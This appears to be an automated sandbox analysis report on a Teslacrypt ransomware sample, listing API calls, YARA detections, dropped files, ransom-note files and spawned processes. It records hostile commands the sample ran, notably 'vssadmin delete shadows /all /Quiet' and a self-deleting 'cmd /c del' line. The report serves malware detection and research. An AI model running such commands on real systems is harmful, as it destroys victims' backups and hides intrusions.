Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041ED00 SHGetFolderPathW,GetModuleHandleW,RtlGetVersion,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcessId,LoadIconW,RegisterClassExW,VirtualProtect,InterlockedExchange,CreateWindowExW,GetStartupInfoW,ExpandEnvironmentStringsW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,GetMessageW,TranslateMessage,GetMessageW,TranslateMessage,DispatchMessageW,UnregisterClassW,ExitProcess,2_2_0041ED00
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041EA80 GetProcessHeap,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetSystemDirectoryA,_strcpy_s,GetProcessHeap,HeapFree,LoadLibraryExA,GetProcAddress,FreeLibrary,GetProcessHeap,HeapFree,2_2_0041EA80
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004040000_2_00404000
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0040E4F00_2_0040E4F0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041F4900_2_0041F490
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004190900_2_00419090
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_00422CA70_2_00422CA7
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004238A50_2_004238A5
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004179000_2_00417900
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004115100_2_00411510
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004111200_2_00411120
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004205800_2_00420580
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004039B00_2_004039B0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041F1B00_2_0041F1B0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041A6700_2_0041A670
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041AE100_2_0041AE10
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004042E00_2_004042E0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004032F00_2_004032F0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041AEF90_2_0041AEF9
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041BA800_2_0041BA80
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041AAB00_2_0041AAB0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0040DF500_2_0040DF50
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004123000_2_00412300
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004227200_2_00422720
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_00421B210_2_00421B21
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004127E00_2_004127E0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0040C3800_2_0040C380
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_00411B800_2_00411B80
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B1AF50_2_003B1AF5
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B0C6D0_2_003B0C6D
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B0C470_2_003B0C47
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B0C8C0_2_003B0C8C
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B00DD0_2_003B00DD
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B00D30_2_003B00D3
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B0CC00_2_003B0CC0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B01310_2_003B0131
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B01190_2_003B0119
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B1B340_2_003B1B34
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B1B6A0_2_003B1B6A
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B1BE90_2_003B1BE9
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004179002_2_00417900
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041AE102_2_0041AE10
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004040002_2_00404000
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0040E4F02_2_0040E4F0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004190902_2_00419090
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041F4902_2_0041F490
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_00422CA72_2_00422CA7
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004238A52_2_004238A5
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004115102_2_00411510
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004111202_2_00411120
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004205802_2_00420580
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004039B02_2_004039B0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041F1B02_2_0041F1B0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004042E02_2_004042E0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004032F02_2_004032F0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041AEF92_2_0041AEF9
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041BA802_2_0041BA80
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041AAB02_2_0041AAB0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0040DF502_2_0040DF50
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004123002_2_00412300
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004227202_2_00422720
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_00421B212_2_00421B21
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004127E02_2_004127E0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0040C3802_2_0040C380
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_00411B802_2_00411B80
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_00231AF52_2_00231AF5
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_00230C6D2_2_00230C6D
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_00230C472_2_00230C47
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_00230C8C2_2_00230C8C
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_00230CC02_2_00230CC0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_002300D32_2_002300D3
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_002300DD2_2_002300DD
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_002301312_2_00230131
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_002301192_2_00230119
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_00231B342_2_00231B34
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_00231B6A2_2_00231B6A
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_00231BE92_2_00231BE9
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 11_2_00231AF511_2_00231AF5
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 11_2_00230C6D11_2_00230C6D
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 11_2_00230C4711_2_00230C47
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 11_2_00230C8C11_2_00230C8C
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 11_2_00230CC011_2_00230CC0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 11_2_002300D311_2_002300D3
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 11_2_002300DD11_2_002300DD
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 11_2_0023013111_2_00230131
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 11_2_00231B3411_2_00231B34
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 11_2_0023011911_2_00230119
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 11_2_00231B6A11_2_00231B6A
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 11_2_00231BE911_2_00231BE9
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 12_2_002B1AF512_2_002B1AF5
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 12_2_002B0C6D12_2_002B0C6D
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 12_2_002B0C4712_2_002B0C47
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 12_2_002B0C8C12_2_002B0C8C
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 12_2_002B0CC012_2_002B0CC0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 12_2_002B00DD12_2_002B00DD
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 12_2_002B00D312_2_002B00D3
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 12_2_002B013112_2_002B0131
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 12_2_002B1B3412_2_002B1B34
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 12_2_002B011912_2_002B0119
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 12_2_002B1B6A12_2_002B1B6A
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 12_2_002B1BE912_2_002B1BE9
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 13_2_00231AF513_2_00231AF5
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 13_2_00230C6D13_2_00230C6D
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 13_2_00230C4713_2_00230C47
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 13_2_00230C8C13_2_00230C8C
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 13_2_00230CC013_2_00230CC0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 13_2_002300D313_2_002300D3
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 13_2_002300DD13_2_002300DD
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 13_2_0023013113_2_00230131
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 13_2_00231B3413_2_00231B34
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 13_2_0023011913_2_00230119
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 13_2_00231B6A13_2_00231B6A
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 13_2_00231BE913_2_00231BE9
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: String function: 004299A0 appears 31 times
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: String function: 004299A0 appears 31 times
Source: 0t8amSU3vd.exe, 00000000.00000002.345325863.00000000002AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 0t8amSU3vd.exe
Source: 0t8amSU3vd.exe, 00000000.00000003.344863487.00000000002AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 0t8amSU3vd.exe
Source: 0t8amSU3vd.exe, 00000000.00000000.343903709.0000000000518000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMacrobiotic.exe4 vs 0t8amSU3vd.exe
Source: 0t8amSU3vd.exeBinary or memory string: OriginalFilenameMacrobiotic.exe4 vs 0t8amSU3vd.exe
Source: 0t8amSU3vd.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 2.2.svcmtr.exe.240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 13.2.svcmtr.exe.240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 2.2.svcmtr.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.2.svcmtr.exe.2c0000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.2.svcmtr.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 13.2.svcmtr.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.2.svcmtr.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.0t8amSU3vd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.2.svcmtr.exe.2c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.0t8amSU3vd.exe.520000.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.0t8amSU3vd.exe.520000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 13.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 2.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0t8amSU3vd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svcmtr.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winEXE@26/1205@15/13
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041E810 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,0_2_0041E810
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041E810 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,2_2_0041E810
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041B2C0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_0041B2C0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041D4D0 LoadStringW,LoadStringW,LoadStringW,CoInitializeEx,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,CoCreateInstance,CoCreateInstance,CoCreateInstance,ExitProcess,_memset,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,CreateMutexW,GetLastError,_memset,GetVersionExW,CreateThread,CreateThread,_memset,__wfopen_s,_fprintf,CreateThread,CreateThread,CreateThread,SetThreadPriority,WaitForSingleObject,WaitForSingleObject,_memset,ShellExecuteW,ShellExecuteW,ShellExecuteW,ShellExecuteW,CreateThread,WaitForSingleObject,CreateThread,WaitForSingleObject,0_2_0041D4D0
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google
Source: C:\Users\user\Desktop\0t8amSU3vd.exeFile created: C:\Users\user\AppData\Roaming\svcmtr.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeMutant created: \Sessions\1\BaseNamedObjects\435-3435-4546
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Low\restore_files_gpmus.txtJump to behavior
Source: C:\Windows\System32\vssadmin.exeConsole Write: ........................................(.P.....d.......l........................................................................'.@............Jump to behavior
Source: C:\Windows\System32\vssadmin.exeConsole Write: .................+.@............N.o. .i.t.e.m.s. .f.o.u.n.d. .t.h.a.t. .s.a.t.i.s.f.y. .t.h.e. .q.u.e.r.y.......X.......P........+.@............Jump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: scan0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: SCAN0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: KERNEL320_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: \Recovery_File_0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: .txt0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: 435-3435-45460_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: %s%s%s%S0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: open0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: open0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: open0_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: scan2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: SCAN2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: KERNEL322_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: \Recovery_File_2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: .txt2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: 435-3435-45462_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: E722D94C1CAC34B2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: E722D94C1CAC34B2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: E722D94C1CAC34B2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: %s%s%s%S2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: open2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: open2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: open2_2_0041D4D0
Source: 0t8amSU3vd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\0t8amSU3vd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 0t8amSU3vd.exeReversingLabs: Detection: 91%
Source: C:\Users\user\Desktop\0t8amSU3vd.exeFile read: C:\Users\user\Desktop\0t8amSU3vd.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\0t8amSU3vd.exe "C:\Users\user\Desktop\0t8amSU3vd.exe"
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Users\user\AppData\Roaming\svcmtr.exe C:\Users\user\AppData\Roaming\svcmtr.exe
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
Source: unknownProcess created: C:\Users\user\AppData\Roaming\svcmtr.exe "C:\Users\user\AppData\Roaming\svcmtr.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\svcmtr.exe "C:\Users\user\AppData\Roaming\svcmtr.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\svcmtr.exe "C:\Users\user\AppData\Roaming\svcmtr.exe"
Source: unknownProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.html
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1444 --field-trial-handle=1208,i,4485940417927276280,14403554526492516596,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.txt
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Users\user\AppData\Roaming\svcmtr.exe C:\Users\user\AppData\Roaming\svcmtr.exeJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NULJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1444 --field-trial-handle=1208,i,4485940417927276280,14403554526492516596,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: dwmapi.dllJump to behavior
